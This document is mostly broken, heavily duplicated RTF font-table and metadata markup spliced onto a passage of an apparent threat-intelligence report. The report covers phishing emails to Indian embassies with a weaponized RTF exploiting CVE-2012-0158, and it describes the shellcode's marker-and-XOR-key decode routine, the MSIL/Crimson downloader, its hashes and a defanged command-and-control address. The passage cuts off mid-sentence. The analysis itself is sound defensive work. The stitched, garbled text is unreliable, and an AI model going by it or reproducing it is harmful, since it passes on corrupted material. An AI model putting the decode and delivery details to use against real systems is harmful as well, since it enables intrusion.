@\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1 Western;}{\\f950\\fbidi \\fmodern\\fcharset238\\fprq1 Consolas CE;}{\\f951\\fbidi \\fmodern\\fcharset204\\fprq1 Consolas Cyr;}{\\f953\\fbidi \\fmodern\\fcharset161\\fprq1 Consolas Greek;} {\\f950\\fbidi \\fmodern\\fcharset238\\fprq1 Consolas CE;}{\\f951\\fbidi \\fmodern\\fcharset204\\fprq1 Consolas Cyr;}{\\f953\\fbidi \\fmodern\\fcharset161\\fprq1 Consolas Greek;}{\\f954\\fbidi \\fmodern\\fcharset162\\fprq1 Consolas Tur;} {\\f951\\fbidi \\fmodern\\fcharset204\\fprq1 Consolas Cyr;}{\\f953\\fbidi \\fmodern\\fcharset161\\fprq1 Consolas Greek;}{\\f954\\fbidi \\fmodern\\fcharset162\\fprq1 Consolas Tur;}{\\f957\\fbidi \\fmodern\\fcharset186\\fprq1 Consolas Baltic;} {\\f954\\fbidi \\fmodern\\fcharset162\\fprq1 Consolas Tur;}{\\f957\\fbidi \\fmodern\\fcharset186\\fprq1 Consolas Baltic;}{\\f958\\fbidi \\fmodern\\fcharset163\\fprq1 Consolas (Vietnamese);}{\\f982\\fbidi \\froman\\fcharset0\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Western;} {\\f957\\fbidi \\fmodern\\fcharset186\\fprq1 Consolas Baltic;}{\\f958\\fbidi \\fmodern\\fcharset163\\fprq1 Consolas (Vietnamese);}{\\f982\\fbidi \\froman\\fcharset0\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Western;}{\\f980\\fbidi \\froman\\fcharset238\\fprq2 @\\'b9\\'d9\\'c5\\'c1 CE;} {\\f957\\fbidi \\fmodern\\fcharset186\\fprq1 Consolas Baltic;}{\\f958\\fbidi \\fmodern\\fcharset163\\fprq1 Consolas (Vietnamese);}{\\flomajor\\f31508\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\f958\\fbidi \\fmodern\\fcharset163\\fprq1 Consolas (Vietnamese);}{\\f1072\\fbidi \\fmodern\\fcharset0\\fprq1 GulimChe Western;}{\\f1070\\fbidi \\fmodern\\fcharset238\\fprq1 GulimChe CE;}{\\f1071\\fbidi \\fmodern\\fcharset204\\fprq1 GulimChe Cyr;} {\\f980\\fbidi \\froman\\fcharset238\\fprq2 @\\'b9\\'d9\\'c5\\'c1 CE;}{\\f981\\fbidi \\froman\\fcharset204\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Cyr;}{\\f983\\fbidi \\froman\\fcharset161\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Greek;}{\\f984\\fbidi \\froman\\fcharset162\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Tur;} {\\f981\\fbidi \\froman\\fcharset204\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Cyr;}{\\f983\\fbidi \\froman\\fcharset161\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Greek;}{\\f984\\fbidi \\froman\\fcharset162\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Tur;}{\\f987\\fbidi \\froman\\fcharset186\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Baltic;} {\\f987\\fbidi \\froman\\fcharset186\\fprq2 @\\'b9\\'d9\\'c5\\'c1 Baltic;}{\\f992\\fbidi \\fmodern\\fcharset0\\fprq1 @MingLiU Western;}{\\f1002\\fbidi \\fmodern\\fcharset0\\fprq1 @MS Mincho Western;}{\\f1000\\fbidi \\fmodern\\fcharset238\\fprq1 @MS Mincho CE;} {\\f992\\fbidi \\fmodern\\fcharset0\\fprq1 @MingLiU Western;}{\\f1072\\fbidi \\fmodern\\fcharset0\\fprq1 GulimChe Western;}{\\f1070\\fbidi \\fmodern\\fcharset238\\fprq1 GulimChe CE;}{\\f1071\\fbidi \\fmodern\\fcharset204\\fprq1 GulimChe Cyr;} {\\fbimajor\\f31503\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;}{\\flominor\\f31504\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;} {\\fbimajor\\f31539\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\fbimajor\\f31541\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fbimajor\\f31542\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;} {\\fbimajor\\f31541\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fbimajor\\f31542\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\fbimajor\\f31543\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\fbimajor\\f31543\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\fbimajor\\f31544\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fbimajor\\f31545\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;} {\\fbimajor\\f31544\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fbimajor\\f31545\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\fbimajor\\f31546\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);} {\\fbimajor\\f31546\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\flominor\\f31548\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\flominor\\f31549\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;} {\\fbiminor\\f31507\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;}{\\f540\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\f541\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;} {\\fbiminor\\f31579\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\fbiminor\\f31581\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fbiminor\\f31582\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;} {\\fbiminor\\f31581\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fbiminor\\f31582\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\fbiminor\\f31583\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\fbiminor\\f31583\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\fbiminor\\f31584\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fbiminor\\f31585\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;} {\\fbiminor\\f31584\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fbiminor\\f31585\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\fbiminor\\f31586\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}} {\\fbiminor\\f31586\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}}{\\colortbl;\\red0\\green0\\blue0;\\red0\\green0\\blue255;\\red0\\green255\\blue255;\\red0\\green255\\blue0;\\red255\\green0\\blue255;\\red255\\green0\\blue0;\\red255\\green255\\blue0; {\\fdbmajor\\f31501\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;}{\\fhimajor\\f31502\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria;} {\\fdbmajor\\f31520\\fbidi \\fmodern\\fcharset0\\fprq2 Malgun Gothic Western;}{\\fhimajor\\f31528\\fbidi \\froman\\fcharset238\\fprq2 Cambria CE;}{\\fhimajor\\f31529\\fbidi \\froman\\fcharset204\\fprq2 Cambria Cyr;} {\\fdbminor\\f31505\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;}{\\fhiminor\\f31506\\fbidi \\fswiss\\fcharset0\\fprq2{\\*\\panose 020f0502020204030204}Calibri;} {\\fdbminor\\f31560\\fbidi \\fmodern\\fcharset0\\fprq2 Malgun Gothic Western;}{\\fhiminor\\f31568\\fbidi \\fswiss\\fcharset238\\fprq2 Calibri CE;}{\\fhiminor\\f31569\\fbidi \\fswiss\\fcharset204\\fprq2 Calibri Cyr;} {\\fhimajor\\f31502\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria;}{\\fbimajor\\f31503\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;} {\\fhimajor\\f31528\\fbidi \\froman\\fcharset238\\fprq2 Cambria CE;}{\\fhimajor\\f31529\\fbidi \\froman\\fcharset204\\fprq2 Cambria Cyr;}{\\fhimajor\\f31531\\fbidi \\froman\\fcharset161\\fprq2 Cambria Greek;}{\\fhimajor\\f31532\\fbidi \\froman\\fcharset162\\fprq2 Cambria Tur;} {\\fhimajor\\f31529\\fbidi \\froman\\fcharset204\\fprq2 Cambria Cyr;}{\\fhimajor\\f31531\\fbidi \\froman\\fcharset161\\fprq2 Cambria Greek;}{\\fhimajor\\f31532\\fbidi \\froman\\fcharset162\\fprq2 Cambria Tur;} {\\fhimajor\\f31531\\fbidi \\froman\\fcharset161\\fprq2 Cambria Greek;}{\\fhimajor\\f31532\\fbidi \\froman\\fcharset162\\fprq2 Cambria Tur;}{\\fhimajor\\f31535\\fbidi \\froman\\fcharset186\\fprq2 Cambria Baltic;} {\\fhimajor\\f31535\\fbidi \\froman\\fcharset186\\fprq2 Cambria Baltic;}{\\fhimajor\\f31536\\fbidi \\froman\\fcharset163\\fprq2 Cambria (Vietnamese);}{\\fbimajor\\f31538\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\fhimajor\\f31536\\fbidi \\froman\\fcharset163\\fprq2 Cambria (Vietnamese);}{\\fbimajor\\f31538\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\fbimajor\\f31539\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;} {\\fhiminor\\f31506\\fbidi \\fswiss\\fcharset0\\fprq2{\\*\\panose 020f0502020204030204}Calibri;}{\\fbiminor\\f31507\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;}{\\f540\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\fhiminor\\f31568\\fbidi \\fswiss\\fcharset238\\fprq2 Calibri CE;}{\\fhiminor\\f31569\\fbidi \\fswiss\\fcharset204\\fprq2 Calibri Cyr;}{\\fhiminor\\f31571\\fbidi \\fswiss\\fcharset161\\fprq2 Calibri Greek;}{\\fhiminor\\f31572\\fbidi \\fswiss\\fcharset162\\fprq2 Calibri Tur;} {\\fhiminor\\f31571\\fbidi \\fswiss\\fcharset161\\fprq2 Calibri Greek;}{\\fhiminor\\f31572\\fbidi \\fswiss\\fcharset162\\fprq2 Calibri Tur;}{\\fhiminor\\f31575\\fbidi \\fswiss\\fcharset186\\fprq2 Calibri Baltic;} {\\fhiminor\\f31575\\fbidi \\fswiss\\fcharset186\\fprq2 Calibri Baltic;}{\\fhiminor\\f31576\\fbidi \\fswiss\\fcharset163\\fprq2 Calibri (Vietnamese);}{\\fbiminor\\f31578\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\fhiminor\\f31576\\fbidi \\fswiss\\fcharset163\\fprq2 Calibri (Vietnamese);}{\\fbiminor\\f31578\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\fbiminor\\f31579\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;} {\\flomajor\\f31500\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;}{\\fdbmajor\\f31501\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;} {\\flomajor\\f31508\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\flomajor\\f31509\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\flomajor\\f31511\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;} {\\flomajor\\f31509\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\flomajor\\f31511\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\flomajor\\f31512\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;} {\\flomajor\\f31511\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\flomajor\\f31512\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\flomajor\\f31513\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\flomajor\\f31512\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\flomajor\\f31513\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\flomajor\\f31514\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);} {\\flomajor\\f31513\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\flomajor\\f31514\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\flomajor\\f31515\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;} {\\flomajor\\f31514\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\flomajor\\f31515\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\flomajor\\f31516\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);} {\\flomajor\\f31515\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\flomajor\\f31516\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\fdbmajor\\f31520\\fbidi \\fmodern\\fcharset0\\fprq2 Malgun Gothic Western;} {\\flomajor\\f31516\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\fdbmajor\\f31520\\fbidi \\fmodern\\fcharset0\\fprq2 Malgun Gothic Western;}{\\fhimajor\\f31528\\fbidi \\froman\\fcharset238\\fprq2 Cambria CE;} {\\flominor\\f31504\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;}{\\fdbminor\\f31505\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;} {\\flominor\\f31548\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\flominor\\f31549\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\flominor\\f31551\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;} {\\flominor\\f31551\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\flominor\\f31552\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\flominor\\f31553\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\flominor\\f31552\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\flominor\\f31553\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\flominor\\f31554\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);} {\\flominor\\f31554\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\flominor\\f31555\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\flominor\\f31556\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);} {\\flominor\\f31555\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\flominor\\f31556\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\fdbminor\\f31560\\fbidi \\fmodern\\fcharset0\\fprq2 Malgun Gothic Western;} {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min53}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min45}{\\version3}{\\edmins1}{\\nofpages1}{\\nofwords215}{\\nofchars1489}{\\nofcharsws1701}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min53}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min46}{\\version3}{\\edmins1}{\\nofpages1}{\\nofwords319}{\\nofchars1696}{\\nofcharsws2011}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min55}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min55}{\\version3}{\\edmins1}{\\nofpages1}{\\nofwords247}{\\nofchars1491}{\\nofcharsws1735}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min56}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min55}{\\version3}{\\edmins1}{\\nofpages1}{\\nofwords302}{\\nofchars1590}{\\nofcharsws1889}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min56}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min56}{\\version3}{\\edmins1}{\\nofpages1}{\\nofwords300}{\\nofchars1599}{\\nofcharsws1896}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min56}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min57}{\\version3}{\\edmins1}{\\nofpages1}{\\nofwords267}{\\nofchars1576}{\\nofcharsws1840}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min56}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min58}{\\version3}{\\edmins0}{\\nofpages1}{\\nofwords297}{\\nofchars1516}{\\nofcharsws1810}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\info{\\author Messi}{\\operator Messi}{\\creatim\\yr2017\\mo5\\dy11\\hr13\\min56}{\\revtim\\yr2017\\mo5\\dy11\\hr14\\min58}{\\version3}{\\edmins1}{\\nofpages1}{\\nofwords292}{\\nofchars1527}{\\nofcharsws1816}{\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/o {\\pntxta \\hich )}}{\\*\\pnseclvl6\\pnlcltr\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}{\\*\\pnseclvl7\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}{\\*\\pnseclvl8\\pnlcltr\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (} {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid11406400 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid11828659 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid12867363 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid1585482 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid1838094 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid3094406 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid3689921 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid4400686 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid4476117 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid4986254 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid6228682 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid6447444 \\rtlch\\fcs1 {\\pntxta \\hich )}}{\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (}{\\pntxta \\hich )}}\\pard\\plain \\ltrpar\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid6827409 \\rtlch\\fcs1 c2\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi0\\deflang1033\\deflangfe1042\\themelang1033\\themelangfe1042\\themelangcs0{\\fonttbl{\\f0\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;} c2\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi0\\deflang1033\\deflangfe1042\\themelang1033\\themelangfe1042\\themelangcs0{\\fonttbl{\\f0\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;}{\\f1\\fbidi \\fswiss\\fcharset0\\fprq2{\\*\\panose 020b0604020202020204}Arial;} c2\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi0\\deflang1033\\deflangfe1042\\themelang1033\\themelangfe1042\\themelangcs0{\\fonttbl{\\f0\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;}{\\f2\\fbidi \\fmodern\\fcharset0\\fprq1{\\*\\panose 02070309020205020404}Courier New;} {\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 {\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 g}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ {\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n t}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ {\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 th}{ {\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14574943\\charrsid15614891 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 >. Meilleur moment pour v\\'e9\\loch\\f31502 \\hich\\f31502 rifier: de 9h00 \\'e0\\loch\\f31502 11h00 du lundi au vendredi. {\\rtlch\\fcs1 \\af53 \\ltrch\\fcs0 \\fs22\\loch\\af31502\\hich\\af31502\\dbch\\af53\\insrsid15301782 \\hich\\af31502\\dbch\\af53\\loch\\f31502 s}{\\rtlch\\fcs1 \\af53 \\ltrch\\fcs0 \\fs22\\loch\\af31502\\hich\\af31502\\dbch\\af53\\insrsid13717663\\charrsid6386681 {\\vern32775}}{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\\paperw12240\\paperh15840\\margl1501\\margr1502\\margt1701\\margb1440\\gutter0\\ltrsect {AEBA21FA-782A-4A90-978D-B72164C80120} {l]k]Y 839569f031a2cb6e9ae1dc797b1bd7cce53d3528c8b5fbec21cecb0de3f5ac88,\xe2\x80\x9ddef.riyadh\xe2\x80\x9d Attachment: 3966f669a6af4278869b9cce0f2d9279, Harrasment (sic) Case Shakantula.doc exploit: CVE-2012-0158 Doc dropped: 6a69cd7a2cb993994fccec7b7e99c5daa5ec8083ba887142cb0242031d7d4966,svchost.exe functionality: downloader Author: Darien Huss https://www.rackspace.com/en-us/mailgun 2 Figure 1: First email sent to Embassy of India, Astana, Kazakhstan Figure 2: Second email sent to Embassy of India, Riyadh, Kingdom of Saudi Arabia 3 In this incident, the attachment was a weaponized RTF document utilizing CVE-2012-0158 to drop an embedded, encoded portable executable (PE). To decode the embedded PE, the document\xe2\x80\x99s shellcode first searches for the 0xBABABABA marker that, when found, will indicate the beginning position of the PE (Fig. 3). The PE is then decoded using the key 0xCAFEBABE while skipping null DWORDs (Fig. 4). A final marker indicates the end of the PE file, which, in this case, is the marker 0xBBBBBBBB. This decode routine, including other components of the exploit document, have been discussed before and have been observed in completely unrelated incidents. Figure 3: Shellcode searching for 0xBABABABA marker https://en.wikipedia.org/wiki/Portable_Executable http://blog.malwareclipboard.com/2015/10/rtf-exploit-document-extraction.html 4 Figure 4: Decoding of encoded PE and searching for terminator marker After successful exploitation and decoding of the embedded payload, a family of malware we refer to as MSIL/ Crimson will be executed on the victim\xe2\x80\x99s machine. The first stage in infection is a downloader whose purpose is to download the more fully featured RAT component. The MSIL/Crimson downloader that was dropped (md5: 3a67ebcab5dc3563dc161fdc3c7fb161) will attempt to download the full RAT from 213.136.87[.]122:10001 (Fig. 5). A full description and analysis of the MSIL/Crimson malware family is provided in the 